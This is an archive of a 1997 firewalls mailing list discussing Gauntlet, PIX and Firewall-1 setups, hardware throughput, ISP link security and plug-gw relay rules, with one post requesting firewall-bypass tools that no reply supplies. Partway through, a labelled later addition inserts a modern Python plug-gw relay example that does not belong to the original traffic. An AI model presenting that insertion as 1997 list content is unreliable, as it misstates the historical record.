From owner-firewalls-outgoing Sun Jun 1 01:00:10 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA00398 for firewalls-outgoing; Sun, 1 Jun 1997 00:56:08 -0700 (PDT)
Received: from flex.flex.ro (flex.flex.ro [193.230.255.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id AAA00391 for ; Sun, 1 Jun 1997 00:56:00 -0700 (PDT)
Received: from scully (dial02.flex.ro [193.230.255.102]) by flex.flex.ro (8.7.5/8.7.3) with ESMTP id KAA15416 for ; Sun, 1 Jun 1997 10:48:24 +0300
Message-Id: <199706010748.KAA15416@flex.flex.ro>
From: "VIOREL DEHELEAN"
To:
Subject: Test
Date: Sun, 1 Jun 1997 10:58:58 +0300
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Testing some mail bugs in Firewalls system...
Sorry


From owner-firewalls-outgoing Sun Jun 1 10:17:26 1997
From: Greg Harp
To: firewalls@greatcircle.com
Date: Sun, 01 Jun 1997 11:53:30 -0500
Subject: TIS Gauntlet -- pass all packets for certain IPs?
Message-Id: <3391A90A.167EB0E7@dfwnet.sbms.sbc.com>

I have an interesting problem. I have a new network (actually, a new service, but we'll leave out the "proprietary" details) going in which must necessarily be connected to both my main data network and the "outside" world, including both our customers and the "untamed" Internet. Here's a quick idea of how things go together:

                               ------
                               |    |   "network entities"
                               --++--
                                 ||
                               --++--
                               |    |   Service Complex         outside:
                               --++--
                                 ||                              --Internet
   ------       ------       ------       ------                /
   |    |-------|    |-------|    |-------|    |<
   ------       ------       ------       ------                \
   "Main"       Cisco         TIS         Cisco                  --Customer
    data        router      Gauntlet      router                   network

I need TCP (telnet and X) and UDP (SNMP) access from the "Main" network to the service complex for management purposes. I must also pass both TCP and UDP (all ports) between the "outside" and the "network entities" (NEs, for short). The service complex acts as a transparent bridge for the IP addresses associated with the NEs.

The IP addresses of the NEs (which have public Class C networks dedicated to them which differ from the rest of the internal net) are the only ones which will be accessible from the outside world (hence the only advertised routes), but as stated it must appear as if they are "directly" on the Internet or the customer's network.

Security of the NEs themselves is of no concern, but security of the Service complex and the "Main" data network is of extreme concern. The customers are responsible for their own security, although we will not be routing packets between them and the Internet.
We currently have a TIS Gauntlet (v3.2a) system available for use in this application, but I'm stumped as to how to get it to "disappear" with respect to this certain range of addresses. For all intents and purposes, when faced with a source (when outgoing) or destination (when incoming) address in the range dedicated to the NEs, I want it to act like a router.

At first, no other traffic will pass through the Gauntlet, although perhaps in the near future there will be certain authenticated traffic allowed to the Service complex itself, as well as possible traffic between the "Main" network and the Internet. These, of course, can be achieved using "normal, everyday" proxies and authentication.

I'm required to use an application gateway-type system here by company policy, with which I agree. While this restricted connectivity could be achieved via an access list in a router, that is not considered secure enough. We need the logging and "failsafes" of a real firewall.

Any suggestions of how to do this with the Gauntlet would be much appreciated. Although I'd prefer to use the TIS product, other ideas are also welcome. BTW, our corporate IS folks [ the ones who will audit this once I get it done ;) ] aren't big fans of the PIX firewalls.

TIA...
--Greg


From owner-firewalls-outgoing Sun Jun 1 11:20:49 1997
From: Jyri Kaljundi
To: Firewalls@GreatCircle.COM
Date: Sun, 1 Jun 1997 21:09:05 +0300 (EET DST)
Subject: Re: Security Crazy
In-Reply-To: <199706010800.BAA00511@honor.greatcircle.com>

Sat, 31 May 1997, Marcus J. Ranum wrote:

>> my CEO has gone security crazy [...] win95
>
> He's a bit unclear on the concept, isn't he?
I am pretty sure there actually are good commercial systems available to make a large number of win95 machines much more secure than they are out of the box. Axent Enterprise Access Control for Windows 95 is one such beast; more information is at http://www.axent.com/product/eacw/eacw.htm

Jüri


From owner-firewalls-outgoing Sun Jun 1 12:15:06 1997
From: "Randy.Witlicki."
To: firewalls@greatcircle.com
Date: Sun, 1 Jun 1997 15:19:57 -0400
Subject: Apparent ANSWER: Cisco PIX Version 4 udp problem

Don't you just love it when you answer your own post?

So there I am, out for my afternoon run. Are nice spring thoughts in my mind? No, it's full of packets and protocols and such. A probable answer hits me, so I get back to the PIX and turn on verbose syslogging.

In my previous post I said:

> ...... PIX firewall Version 4.0.4
> However, when I try the Streamworks or VDOLive web plug-ins,
> I get the following at the PIX console (with no *established*
> command in the configuration):
>
> <162> 106006 deny inbound udp from x.x.x.x 7001 to 192.168.1.2 1144
> and
> <162> 106006 deny inbound udp from x.x.x.x 7001 to 192.168.1.2 1263

I try a site with VDO that I know is not very big. It works.
I go back to my test case and it fails. The PIX syslog output has:

<166> 304001 192.168.1.2 accessed URL 207.40.202.22:/nbrx.vdo HTTP/1.0

followed shortly by:

<162> 106006 deny inbound udp from 207.40.202.254 7001 to 192.168.1.2 1191

This is on http://intv.net

% traceroute intv.net
traceroute to intv.net (207.40.202.22), 30 hops max, 40 byte packets
......
15  AccessUS-1.ChcgIL.savvis.com (206.114.200.250)
16  vision.accessus.net (207.40.202.254)

So the URL was at .22 and the UDP stream came from .254, and it looks like the cisco PIX "enhanced multimedia Adaptive Security algorithm" (to use cisco's terminology) does not allow for this situation.

- Randy
randy.witlicki@valley.net
Norwich, Vermont USA
-


From owner-firewalls-outgoing Sun Jun 1 14:30:18 1997
From: Benedikt Stockebrand
To: Dana Bourgeois
Cc: "firewalls@GreatCircle.COM"
Date: 01 Jun 1997 14:44:33 +0200
Subject: Re: (Fwd) Ukiah Software
References: <01BC6A86.AF5E0E30@pinpc30.corp.portal.com>
In-Reply-To: Dana Bourgeois's message of Tue, 27 May 1997 10:15:28 -0700
Message-ID: <87raemcx1q.fsf@devnull.ruhr.de>

Dana Bourgeois writes:

> No, the problem I have with businesses like cyberpromo is that one method
> they use to avoid SPAM filters is forged mail. Forged mail and news headers
> should be illegal with heavy criminal penalties and simple civil remedies
> (and triple damages!!)

Check the latest digest in the comp.risks newsgroup about this. Some folks are currently trying to sue a somewhat minor spammer---I suppose they want to create a precedence(exp?) case so there'll be a reasonable chance to deal with the Big Bastards (TM) later on.

Ben

--
Ben(edikt)? Stockebrand     Runaway ping.de Admin---Never Ever Trust Old Friends
My name and email address are not to be added to any list used for advertising
purposes. Any sender of unsolicited advertisement e-mail to this address
implicitly agrees to pay a DM 500 fee to the recipient for proofreading services.


From owner-firewalls-outgoing Sun Jun 1 15:04:34 1997
From: Patrik Backstrom
To: firewalls@greatcircle.com
Date: Sun, 1 Jun 1997 23:54:20 +0200 (MET DST)
Subject: Firewall-1 3.0 prices

I would like to know the approx listing prices for Firewall-1 unlimited users, with and without encrypting support, in the US and in the UK.

Thanks in advance.
/pb
---------------------------------------------------------------------
Patrik Bäckström (BOFH)        Phone........: +46-(0)706-661928
Hjalmar Bergmans gata 50       Homepage.....: http://warp.techno.org/~pb
422 52 Hisings Backa           E-Mail.......: pb@techno.org
                               PGP Pub Key..: http://warp.techno.org/~pb/pgpkey
                                        \....: finger pb@techno.org
---------------------------------------------------------------------


From owner-firewalls-outgoing Sun Jun 1 15:49:03 1997
From: "Luke Gill"
To:
Date: Sun, 1 Jun 1997 18:31:37 -0400
Subject: Sun Sparc20 FDDI and FAST Ethernet Performance Specs
Message-Id: <199706012233.SAA02365@smtp3.erols.com>

Has anyone tested the throughput on a Sun Sparc20 with sbus FDDI and FAST Ethernet cards? If so, what is the throughput? Also, if available, has the same testing been done with those cards with a Gauntlet firewall installed on the box?

Configurations I am interested in:

1. SUN FDDI sbus card to Sun FDDI sbus card
2. SUN FAST ethernet sbus card to Sun FAST Ethernet sbus card
3. #1 with Gauntlet 3.2a installed
4. #2 with Gauntlet 3.2a installed

Need these numbers to corroborate or disprove some testing I am currently doing in my own test environment. Any info would be appreciated.
Luke Gill


From owner-firewalls-outgoing Sun Jun 1 21:45:09 1997
From: Ken Hardy
To: VIOREL DEHELEAN
cc: firewalls@GreatCircle.COM
Date: Sun, 1 Jun 1997 23:36:03 -0500 (CDT)
Subject: Re: Test
In-Reply-To: <199706010748.KAA15416@flex.flex.ro>

On Sun, 1 Jun 1997, VIOREL DEHELEAN wrote:

> Testing some mail bugs in Firewalls system...
> Sorry

You should be, disturbing thousands of disinterested people for your private testing needs.

Anyone who has occasional need to test outgoing and/or incoming mail handling should get a reflector account, such as is available for free from www.iname.com. Subscribe for an alias to your own real mail address. Send a message to the alias. If it lands in your mailbox you've successfully tested mail delivery in both directions. This makes for a quick and easy check of the integrity of the mail delivery system and of the firewall insofar as it's related.
Another indispensable tool is a shell account on a remote system from which you can examine your public DNS, see exactly how addresses in your outbound mail appear, run test probes of your own firewall, &c., &c., &c.

--
KH


From owner-firewalls-outgoing Mon Jun 2 02:15:17 1997
From: Cihan Subasi
Reply-To: csubasi@garanti.com.tr
Organization: Garanti Ticaret
To: Firewall Mailing List
Date: Mon, 02 Jun 1997 10:34:55 -0700
Subject: FW-1 evaluation....
Message-Id: <3393043F.27FF@garanti.com.tr>

I am in the process of evaluating FW-1 and also comparing it with SNG... In the demo environment we have one network (a C-class) as an internal network, one DMZ (a subnet of an A-class network) and an external network (the rest of the A-class network), but in reality we'll have the C-class on the external side and the rest of the A-class network will be the internal network. My question is how the subnets will route the Internet packets to the firewall, since their default gateway will not be FW-1? In SNG this problem was solved by using SOCKS, and in each client we configured SNG as a SOCKS server; in this case all Netscape packets are forwarded to the SOCKS server.
I believe in FW-1 this forwarding should be done by configuring static routes in the gateways. Can anybody help me to solve this problem: how will I route all packets other than the ones with a destination address in the A-class network to the FW-1?

Thanks,

***************************************************************
Cihan Subasi
Garanti Ticaret, Istanbul Turkey
email= cihans@garanti.com.tr or csubasi@garanti.com.tr
Phone= +902126570404   Fax = +902126570473
***************************************************************


From owner-firewalls-outgoing Mon Jun 2 02:51:16 1997
From: Patrik Backstrom
To: firewalls@greatcircle.com
Date: Mon, 2 Jun 1997 11:44:22 +0200 (MET DST)
Subject: Sun Sparc 5 vs. Sun Ultra with Firewall-1

How much traffic can a Sun Sparc 5 handle, with a Firewall-1?

We currently have a 2MBit E1 connection to the Internet, and there are about 75-100 active connections at the same time, and it's steadily growing. About 25% of the connections are from 'hidden' private networks, so it has to be translated.

Can a SS5 handle this, or should we go for an Ultra? What's the limit for what the SS5 can handle?

Thanks in advance.
/pb
---------------------------------------------------------------------
Patrik Bäckström (BOFH)        Phone........: +46-(0)706-661928
Hjalmar Bergmans gata 50       Homepage.....: http://warp.techno.org/~pb
422 52 Hisings Backa           E-Mail.......: pb@techno.org
                               PGP Pub Key..: http://warp.techno.org/~pb/pgpkey
                                        \....: finger pb@techno.org
---------------------------------------------------------------------


From owner-firewalls-outgoing Mon Jun 2 03:49:22 1997
From: "Maurizio Fiocchi"
To:
Date: Mon, 2 Jun 1997 12:33:47 +0200
Subject: PIX and Firewall-1
Message-Id: <199706021345.MAA09733@otmfire.otm.it>

I am appraising two firewalls, the first PIX and the second Firewall-1. From an attentive analysis I have noticed that the two SW have a notable difference regarding the characteristics of administration and of performance. I was wondering whether an analysis or a comparison between the two SW exists, so that I could choose without mistake. Do available documents exist?
Thank you


From owner-firewalls-outgoing Mon Jun 2 04:15:47 1997
From: "Walczak, Joe"
To: "'Firewalls@greatcircle.com'"
Date: Mon, 2 Jun 1997 07:14:58 -0400
Subject: RE: Intrusion testing Q&A
Message-Id: <199706021112.HAA01888@transquest.com>

Might I suggest ISS's Safesuite product. I was recently certified on the product, and it is the best for probing, intrusion and scanning. The firewall scanner portion does a good job by simulating hacker attack techniques as well.

Joe Walczak
TransQuest, Inc

> ----------
> From: Bill Stout[SMTP:stoutb@pios.com]
> Sent: Friday, May 30, 1997 5:20 PM
> To: firewalls@greatcircle.com
> Subject: Intrusion testing Q&A
>
> Is there a Firewall 'Intrusion testing' list somewhere?
>
> I would like to put on my 'black hat' and intrusion test systems I work
> with.
> I would like to put a step-by-step intrusion test procedure together
> to follow for each install. (Hmm, as I write this it occurs to me I could
> pick apart SATAN and such for starters)...
>
> I'm also looking for Windows-based IP Fragmentation tools to break-through
> Packet Filtering or State-based firewalls, and similar tools to break
> through 'generic-gw' ports that people kludge together for
> SQL/RealAudio/HTTPS/NetBIOS/NFS.
>
> 'Just the tools, maam', not theories. I also am specifically targeting
> breaking in, not D.O.S. attacks, and am ignoring trying to hide
> logging traces.
>
> Bill Stout
>
> P.S. - You might not want to cc' the list replying to this one...
>
> -----BEGIN PGP PUBLIC KEY BLOCK-----
> Version: 2.6.2
>
> mQCNAzONuYYAAAEEAKjxmuKulor4vNi5XLPXLYOOg6/9pc6CqcepWm7MMtXaeHN7
> hHUhOT/q55bHtKX6wv97U8jfuZE75pcBTEWpD3yux94+x/RObvQfXO8iAh2KQAk6
> eUtLlR5i79AJ85hLB5WqGcu1mqR89bizNXhPgts+/ULw5UKOODA4r+6ptr35AAUR
> tBxCaWxsIFN0b3V0IDxzdG91dGJAcGlvcy5jb20+
> =dlVd
> -----END PGP PUBLIC KEY BLOCK-----
>
>


From owner-firewalls-outgoing Mon Jun 2 05:00:18 1997
From: Adam Shostack
Message-Id: <199706021144.HAA15210@homeport.org>
Subject: Re: Encrypted traffic between FW-1 GUI client and FW-1 Management Server?
In-Reply-To: <338A9536.B6F42295@nii.ncb.gov.sg> from Martin Khoo at "May 27, 97 04:03:02 pm"
To: martin@nii.ncb.gov.sg
Date: Mon, 2 Jun 1997 07:44:00 -0400 (EDT)
Cc: drexx@pspi.com.ph, firewalls@GreatCircle.COM, Ronnie.Ng@Asia.Sun.COM, fw-1-mailinglist@us.checkpoint.com

I find the use of a proprietary, unpublished encryption algorithm for administration really quite scary. See the Snake Oil FAQ, http://www.research.megasoft.com/people/cmcurtin/snake-oil-faq.html for some arguments against secret and unpublished ciphers.

Also, the function you want in a FW remote admin module is authentication; encryption is useful for keeping your rules secret. (I assume that they're not passing the password over the encrypted link, since there is an obvious replay attack against the start of the connection.) You really want to know that the entire connection is the same one, and that no packet has been inserted, modified, or deleted. This is the functionality that you get from the IPsec Authentication Header. Encryption does not provide it.

Adam

Martin Khoo wrote:
| > |> Does anybody know whether the traffic between GUI Firewall
| > Management Client and Firewall Management
| > |> Server is encrypted or not?
| > I believe that if it's the VPN edition, the FW-1 traffic would then be
| >
| > encrypted.
|
| Traffic between the GUI client and the Mgmt. server is encrypted (it has
| nothing to do with whether it is a VPN or non-VPN version) using
| Checkpoint's encryption algo. called FWZ1 (if I remember correctly)

--
"It is seldom that liberty of any kind is lost all at once."
                                               -Hume


From owner-firewalls-outgoing Mon Jun 2 07:45:30 1997
From: Ken Kempster
Organization: Republic National Bank
To: fwtk , firewalls
Date: Mon, 02 Jun 1997 10:31:54 -0400 (EDT)
Subject: Plug-gw- One to many relationship
Comments: Internet Message: Sender identity is not verified.

Hi all,

Has anyone gotten a one to many relationship to work with FWTK 2.0?

I want to be able to specify
    x.x.x.x plug-to *
or
    x.x.x.x plug-to x.x.x.x x.x.x.x
etc.

thanx for any help.
|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
| Ken Kempster            kempster@monarch.rnb.com        |
| Network Systems Engineer              _\|/_             |
| Republic National Bank                (o o)             |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~oOO-(_)-OOo~~~~~~~~~~~~~~


From owner-firewalls-outgoing Mon Jun 2 08:45:25 1997
From: "Mariko Yashada"
To: "Firewalls Mailing List"
Date: Mon, 02 Jun 97 11:37:15 PDT
Subject: ISP Connection

My company is currently getting Internet access through a local ISP, using PPP connections. We are now considering replacing the dial-up connections with a leased line to the ISP. We will leave our web server at the ISP and will continue to use their e-mail server. There will be a router at the ISP end of the line. The line will connect to our Enterprise Network through a router at our end. We will also put a proxy server at our end to filter outgoing access and do NAT.

The ISP people say this type of connection is more secure than a direct connection to the Internet through say MCI, because our router will be "hidden" behind their routing system. The IP address of our router will not be accessible from outside the ISP domain. We will not allow incoming connections such as telnet or ftp.
We will restrict access from inside the company to e-mail, http, ftp and probably audio.

My question is, how secure is this type of connection? How difficult is it for someone outside the ISP domain to discover and access our connection?

Thanks,
Mariko


From owner-firewalls-outgoing Mon Jun 2 09:00:46 1997
From: "Chartas C. "
To: firewalls@GreatCircle.COM
Date: Tue, 03 Jun 1997 01:26:42 +1000
Subject: E-Commerce Links on various aspects
Message-id: <01IJM9Q1SC1EHT6XBR@vmsuser.acsu.unsw.EDU.AU>

Hi to all,

First of all, a big thank you to all who replied to my queries on EC and Firewall architecture a little while ago.
Secondly, as I had promised, here is a list about Electronic Commerce divided into the following sections:

A) EC
B) Standards
C) Security Issues
D) Government & Associations
E) Legal Issues
F) A Case Study
G) Various Authors on EC
H) Journals & News

A) On E-Commerce & Security

Electronic Commerce and Security
http://www.v-one.com/pubs/ecommerc/ecommerc.htm

Building a New Paradigm for Business
http://galaxy.tradewave.com:80/tradewave/products/whitpapr.html

http://www.saaconsultants.com/
http://www.saa-cons.co.uk/

Electronic Commerce Over The Internet
http://galaxy.tradewave.com:80/tradewave/products/vpiwp.html

The Internet and EDI
http://www.digital.com/info/edi/edi-inet.html

Electronic Commerce, EDI, EDIFACT and Security
http://www.email.demon.co.uk/eees/eees.htm

Electronic Commerce on Internet : Security challenge
http://www.syselog.fr/asia/singapore/expo_ce_security.html

Electronic Commerce Security
http://www.securityserver.com/cgi-local/ssis.pl/category/@elecom.htm

Eric Glover's links to Security and Electronic Commerce
http://ai.eecs.umich.edu/people/compuman/security_links.html

Electronic Commerce Security: Miscellaneous Topics
http://www.securityserver.com/cgi-local/ssis.pl/category/@elecom5.htm

B) On Standards

DISA Home Page
http://www.disa.org/

Secretariat of ECAT - Implementation Conventions
http://snad.ncsl.nist.gov/dartg/edi/ic.html

C) On Security Issues

Basic Flaws in Internet Security and Commerce
http://http.cs.berkeley.edu/~gauthier/endpoint-security.html

D) Government & Associations

Internet and Telecommunications Policy Presentation
http://werbach.com/fcc/iworld.html

Standards Australia On-line
http://www.standards.com.au/~sicsaa/

Federal Communications Commission (FCC) Home Page
http://werbach.com/fcc/

IEC - International Electrotechnical Commission - Home Page (English)
http://www.iec.ch/

Electronic Commerce World Institute
http://www.ecworld.org/

E) On Legal Issues

http://infohaus.com/access/by-seller/benjamin_Wright

F) A Case Study

Case Study: Electronic Commerce on The World Wide Web
http://www.cox.smu.edu/mis/cases/webcase/home.html

G) Various Authors

Roger Clarke's Home Page
http://www.anu.edu.au../people/Roger.Clarke/

ABA Electronic Commerce Division
http://www.abanet.org/scitech/ec/home.html

H) Journals & News on EC

On-line Security Frontier at EC World
http://yama.bus.utexas.edu/ejou/sec/

EC World: On-line journal for electronic commerce - Articles, Resource Directory, Discussions
http://ecworld.utexas.edu/

Online publication
http://www.commerce.net

ComputerWorld Emmerce.
http://www.computerworld.com/emmerce/index.html

----------------
regards,
Constantinos C.


From owner-firewalls-outgoing Mon Jun 2 09:42:02 1997
From: "David Lang"
To: "Ken Kempster" , "fwtk" , "firewalls"
Date: Mon, 2 Jun 1997 08:28:49 -0700
Subject: Re: Plug-gw- One to many relationship
Message-Id: <199706021627.JAA07146@mail.diginsite.com>

This is not supposed to work.

David Lang

----------
> From: Ken Kempster
> To: fwtk ; firewalls
> Subject: Plug-gw- One to many relationship
> Date: Monday, June 02, 1997 7:31 AM
>
> Hi all,
>
> Has anyone gotten a one to many relationship to work
> with FWTK 2.0?
>
> I want to be able to specify x.x.x.x plug-to *
> or
> x.x.x.x plug-to x.x.x.x x.x.x.x etc.
> > > thanx for any help. > > > > > > |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| > | Ken Kempster kempster@monarch.rnb.com | > | Network Systems Engineer _\|/_ | > | Republic National Bank (o o) | > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~oOO-(_)-OOo~~~~~~~~~~~~~~ From owner-firewalls-outgoing Mon Jun 2 09:59:25 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA08684 for firewalls-outgoing; Mon, 2 Jun 1997 08:59:43 -0700 (PDT) Received: from paranoid.convey.ru (ws03.convey.ru [195.182.128.18]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA08676 for ; Mon, 2 Jun 1997 08:59:35 -0700 (PDT) Received: (from ark@localhost) by paranoid.convey.ru (8.7.5/8.7.3) id TAA25472; Mon, 2 Jun 1997 19:48:59 +0400 From: ArkanoiD Message-Id: <199706021548.TAA25472@paranoid.convey.ru> Subject: Re: Plug-gw- One to many relationship To: kempster@monarch.rnb.com (Ken Kempster) Date: Mon, 2 Jun 1997 19:48:51 +0400 (MSD) Cc: fwtk-users@tis.com, firewalls@GreatCircle.COM In-Reply-To: from "Ken Kempster" at Jun 2, 97 10:31:54 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk nuqneH, > > Has anyone gotten a one to many relationship to work > with FWTK 2.0? > > I want to be able to specify x.x.x.x plug-to * > or > x.x.x.x plug-to x.x.x.x x.x.x.x etc. > ..and how should destinations be distinguished? -- _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! 
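The plug-gw thread above (the one-to-many question, "this is not supposed to work", and "how should destinations be distinguished?") turns on one point: a plug relay sees only the port the client connected to and where the connection came from; the client's real destination never reaches the gateway. The following is an added example written for this page, not FWTK code. It parses rules in a form modelled on FWTK's netperm-table plug-gw lines (the exact syntax is an assumption), picks the one destination a (port, source) pair maps to, and pumps bytes both ways the way a plug relay does; rules, addresses and payloads are constructed.

```python
"""Added illustration (not FWTK code) of how a plug-gw style relay picks a
destination. The rule syntax is modelled on FWTK netperm-table plug-gw
lines (assumed form: plug-gw: port <p> <source> -plug-to <host> -port <p>);
the rules, addresses and payloads below are constructed for this example."""
import ipaddress
import socket
import threading

# Constructed sample rules in the assumed netperm-table form.
SAMPLE_RULES = """
# relay NNTP for two internal networks to two different news servers
plug-gw: port 119 10.1.0.0/16 -plug-to 192.0.2.10 -port 119
plug-gw: port 119 10.2.0.0/16 -plug-to 192.0.2.20 -port 119
plug-gw: port 6667 10.1.0.0/16 -plug-to 192.0.2.30 -port 6667
"""


def parse_rules(text):
    """Parse plug-gw lines into dicts; lines that are not plug-gw rules are skipped."""
    rules = []
    for line in text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0] != "plug-gw:":
            continue
        if (len(tokens) != 8 or tokens[1] != "port"
                or tokens[4] != "-plug-to" or tokens[6] != "-port"):
            raise ValueError("unrecognised rule: " + line)
        rules.append({
            "port": int(tokens[2]),
            "src": ipaddress.ip_network(tokens[3]),
            "dst": tokens[5],
            "dst_port": int(tokens[7]),
        })
    return rules


def select_destination(rules, listen_port, client_ip):
    """First matching rule wins. The gateway only knows which port the client
    connected to and where it came from; the client's intended destination
    never reaches the gateway, so a rule like 'plug-to *' has nothing to
    resolve against and each (port, source) pair maps to exactly one host."""
    addr = ipaddress.ip_address(client_ip)
    for rule in rules:
        if rule["port"] == listen_port and addr in rule["src"]:
            return rule["dst"], rule["dst_port"]
    return None


def _pump(src, dst):
    # Copy bytes from src to dst until src closes, then half-close dst.
    while True:
        data = src.recv(4096)
        if not data:
            break
        dst.sendall(data)
    try:
        dst.shutdown(socket.SHUT_WR)
    except OSError:
        pass  # peer already gone


def relay(client_sock, server_sock):
    """Bidirectional byte copy between the accepted client and the chosen server."""
    back = threading.Thread(target=_pump, args=(server_sock, client_sock))
    back.start()
    _pump(client_sock, server_sock)
    back.join()


def relay_roundtrip(request, reply):
    """Drive relay() over socketpairs standing in for the two TCP legs and
    return (bytes the server saw, bytes the client got back)."""
    client_end, gw_client_side = socket.socketpair()
    gw_server_side, server_end = socket.socketpair()
    worker = threading.Thread(target=relay, args=(gw_client_side, gw_server_side))
    worker.start()
    client_end.sendall(request)
    seen = server_end.recv(4096)
    server_end.sendall(reply)
    got = client_end.recv(4096)
    client_end.close()   # client hangs up; forward pump ends
    server_end.close()   # server hangs up; reverse pump ends
    worker.join()
    gw_client_side.close()
    gw_server_side.close()
    return seen, got
```

Note that nothing in the relayed bytes is consulted when choosing the destination; to send one source to several servers you need several listening ports (one rule each), or a protocol-aware proxy that reads the destination from the application data.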
From owner-firewalls-outgoing Mon Jun 2 10:03:15 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA11793 for firewalls-outgoing; Mon, 2 Jun 1997 09:29:26 -0700 (PDT) Received: from brussels.cisco.com (brussels.cisco.com [171.68.129.238]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA11745 for ; Mon, 2 Jun 1997 09:29:10 -0700 (PDT) Received: from cons-evyncke.cisco.com (bru-dhcp30.cisco.com [171.68.129.144]) by brussels.cisco.com (8.8.5/8.8.5) with SMTP id SAA14384; Mon, 2 Jun 1997 18:30:11 +0200 (METDST) Message-Id: <2.2.32.19970602182802.00754200@brussels.cisco.com> X-Sender: evyncke@brussels.cisco.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 02 Jun 1997 18:28:02 +0000 To: "Randy.Witlicki.", firewalls@GreatCircle.COM From: Eric Vyncke Subject: Re: Apparent ANSWER: Cisco PIX Version 4 udp problem Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello Randy, Your interpretation is probably correct... as the control connection is to .22 and the incoming data UDP stream comes from .254, the PIX obviously and securely denies the access. I cannot imagine any secure way of handling it. BTW, even though I work at Cisco, I'm not THE PIX expert. Best regards Eric At 15:19 1/06/97 -0400, Randy.Witlicki. wrote: > > Don't you just love it when you answer your own post? > So there I am, out for my afternoon run. Are nice spring thoughts >in my mind? No, it's full of packets and protocols and such. > A probable answer hits me, so I get back to the PIX and >turn on verbose syslogging. > In my previous post I said: > >> ...... 
PIX firewall Version 4.0.4 >> However, when I try the Streamworks or VDOLive web plug-ins, >>I get the following at the PIX console (with no *established* >>command in the configuration): >> >><162> 106006 deny inbound udp from x.x.x.x 7001 to 192.168.1.2 1144 >> and >><162> 106006 deny inbound udp from x.x.x.x 7001 to 192.168.1.2 1263 > > I try a site with VDO that I know is not very big. It works. I go >back to my test case and it fails. The PIX syslog output has: > ><166> 304001 192.168.1.2 accessed URL 207.40.202.22:/nbrx.vdo HTTP/1.0 > followed shortly by: ><162> 106006 deny inbound udp from 207.40.202.254 7001 to 192.168.1.2 1191 > > This is on http://intv.net >% traceroute intv.net >traceroute to intv.net (207.40.202.22), 30 hops max, 40 byte packets > ...... >15 AccessUS-1.ChcgIL.savvis.com (206.114.200.250) >16 vision.accessus.net (207.40.202.254) > > So the URL was at .22 and the UDP stream came from .254 and it looks >like the cisco PIX "enhanced multimedia Adaptive Security algorithm" >(to use cisco's terminology) does not allow for this situation. > > - Randy randy.witlicki@valley.net > Norwich, Vermont USA > - > > > Eric Vyncke Internet, security consultant Cisco Systems Belgium SA/NV /------------------------------------\ Phone: +32-2-778.4677 | Networks bring | Fax: +32-2-778.4300 | people | E-mail: evyncke@cisco.com | together... 
| Mobile: +32-75-312.458 \------------------------------------/ From owner-firewalls-outgoing Mon Jun 2 10:15:45 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA17357 for firewalls-outgoing; Mon, 2 Jun 1997 10:08:53 -0700 (PDT) Received: from balder-int.ssds.com (balder.ssds.com [204.131.72.62]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA17246 for ; Mon, 2 Jun 1997 10:08:31 -0700 (PDT) Received: by balder-int.ssds.com id LAA27735; Mon, 2 Jun 1997 11:09:24 -0600 (MDT) Received: from denver.ssds.com(134.127.16.1) by balder.ssds.com via smap (3.2) id xma027713; Mon, 2 Jun 97 11:08:59 -0600 Received: by denver.ssds.com id LAA19596; Mon, 2 Jun 1997 11:11:31 -0600 (MDT) Date: Mon, 2 Jun 1997 11:11:30 -0600 (MDT) From: Scott Lupfer - Colorado Springs X-Sender: svl@denver To: Mariko Yashada cc: Firewalls Mailing List Subject: Re: ISP Connection In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Actually, this is secure, but it is not any less secure than MCI for instance. At a customer site, we have a connection to MCI and it is advertised as a class C address from MCI as part of the MCI.COM domain. The only difference we noticed when we researched this type of service was performance. With MCI we get full T-1 to the MCI Internet POP, whereas you may only get full T-1 to the ISP and then compete with everyone else for part of the bandwidth to the internet. On Mon, 2 Jun 1997, Mariko Yashada wrote: > Date: Mon, 02 Jun 97 11:37:15 PDT > From: Mariko Yashada > To: Firewalls Mailing List > Subject: ISP Connection > > > > My company is currently getting Internet access through a local ISP, using > PPP connections. We are now considering replacing the dial-up connections > with a leased line to the ISP. We will leave our web server at the ISP and > will continue to use their e-mail server. There will be a router at the ISP > end of the line. 
